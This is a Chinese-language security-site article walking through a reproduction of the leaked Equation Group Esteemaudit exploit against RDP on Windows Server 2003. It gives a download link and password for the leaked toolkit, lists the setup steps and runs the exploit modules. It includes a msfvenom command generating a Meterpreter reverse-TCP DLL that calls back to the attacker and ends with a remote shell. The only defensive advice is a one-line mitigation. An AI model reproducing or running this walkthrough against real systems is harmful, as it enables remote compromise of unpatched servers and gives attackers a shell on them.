方程式组织泄露windows框架漏洞工具Esteemaudit RDP 漏洞-华盟网

方程式组织泄露windows框架漏洞工具Esteemaudit RDP 漏洞

华盟学院山东省第二期线下学习计划

1.复现环境:

• windows2003 sp2 x86

• windows2003 配置域服务器

 

2.环境搭建:

从  https://yadi.sk/d/NJqzpqo_3GxZA4下载本次泄露的文件

在 linux下通过密码: Reeeeeeeeeeeeeee 和以下命令解压这三个文件

 

$ gpg windows.tar.xz.gpg

gpg: AES 加密过的数据

请输入密码:

$ tar xvf windows.tar.xz

本次泄露的众多 Exploit都存放在 windows文件夹下。将 windows文件夹拷贝到windows电脑下。

在 windows下操作步骤如下:

1. 关闭 windows防火墙

2. 下载并安装 python2.6(https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi)

3. 将 python添加至环境变量中

4. 下载并安装

Pywin2.6(https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/pywin32-221.win32-py2.6.exe/download)

5. 进入 windows文件夹,在命令行下输入 mkdir listeningposts,接着运行  python fb.py  即可开始攻击

3. 漏洞利用:

我们这里运行 python fb.py,首先创建一个工程:

1

然后输入 use Esteemaudit加载 Esteemaudit 模块:

2

在这里我们选择目标架构,设置目标 IP和端口,设置完成后即可执行对目标的检测:

3

然后我们选择callback模式,选择对应的系统版本和callbackport:

4

到这里我们已经检测到目标服务器存在漏洞

5

这里检测到目标存在漏洞,接下来我们使用  Pcdlllauncher 来进行漏洞利用

6

这里我们需要用msfvenom 生成一个漏洞利用的DLL:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f dll > rdp.dll

然后载入生成的 dll文件

7

配置完毕 执行payload

8

这里我们可以在metasploit里看到 shell已经回显了

9

4.漏洞防护措施

www.idc126.com

到目前为止官方没有发布任何该漏洞的补丁,为保证系统安全,建议关闭智能卡登录。

本文由 华盟网 作者:congtou 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论